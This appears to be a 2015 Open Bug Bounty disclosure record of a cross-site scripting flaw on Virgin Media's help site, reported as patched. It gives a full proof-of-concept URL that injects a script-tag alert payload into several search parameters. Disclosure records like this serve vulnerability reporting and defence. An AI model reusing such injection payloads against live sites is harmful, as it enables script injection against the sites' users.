help.virginmedia.com XSS vulnerability

2015-11-04T06:46:00
ID OBB:100688
Type openbugbounty
Reporter Spam404
Modified 2015-11-04T06:48:00

Description

Vulnerable URL:
https://help.virginmedia.com/system/selfservice.controller?criterion=kb%3A%3Aarticle_search_data%23name%23string_text%23all_of_these%23%3C%2Fscript%3E%3Cscript%3Ealert%28%27XSSPOSED%27%29%3C%2Fscript%3E%23or%24kb%3A%3Aarticle_search_data%23article_key_words%23string_text%23all_of_these%23%3C%2Fscript%3E%3Cscript%3Ealert%28%27XSSPOSED%27%29%3C%2Fscript%3E%23or%24&pageSize;=10&CMD;=ADV_SEARCH&KEYWORDS;=%3C%2Fscript%3E%3Cscript%3Ealert%24%27XSSPOSED%27%24%3C%2Fscript%3E&TOPIC;_NAME=All+topics&SUBTOPIC;_NAME=All+Subtopics&subTopicType;=0&BOOL;_SEARCHSTRING=+%26wtquote%3B%3C%2Fscript%3E%3Cscript%3Ealert%26wtquote%3B++and++%28++%26wtquote%3B%27XSSPOSED%27%26wtquote%3B++%29++and++%26wtquote%3B%3C%2Fscript%3E%26wtquote%3B+&SIDE;_LINK_TOPIC_ID=&SIDE;_LINK_SUB_TOPIC_ID=&EXPANDED;_TOPIC_TREE_NODES=&VM;_CUSTOMER_TYPE=Cable&VM;_CUSTOMER_TYPE=National&searchString;=%3C%2Fscript%3E%3Cscript%3Ealert%28%27XSSPOSED%27%29%3C%2Fscript%3E&searchStringDummy;=%3C%2Fscript%3E%3Cscript%3Ealert%28%27XSSPOSED%27%29%3C%2Fscript%3E&USERTYPE;=1&CONFIGURATION;=1001&PARTITION;_ID=1&TIMEZONE;_OFFSET=
Details:

Description| Value
---|---
Patched:| Yes, at 25.11.2015
Latest check for patch:| 25.11.2015 07:04 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
Google Pagerank| 5
VIP website status:| No
Check help.virginmedia.com SSL connection:| (Grade: A-)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 4 November, 2015 06:46 GMT
Vulnerability existence verified and confirmed| 4 November, 2015 06:48 GMT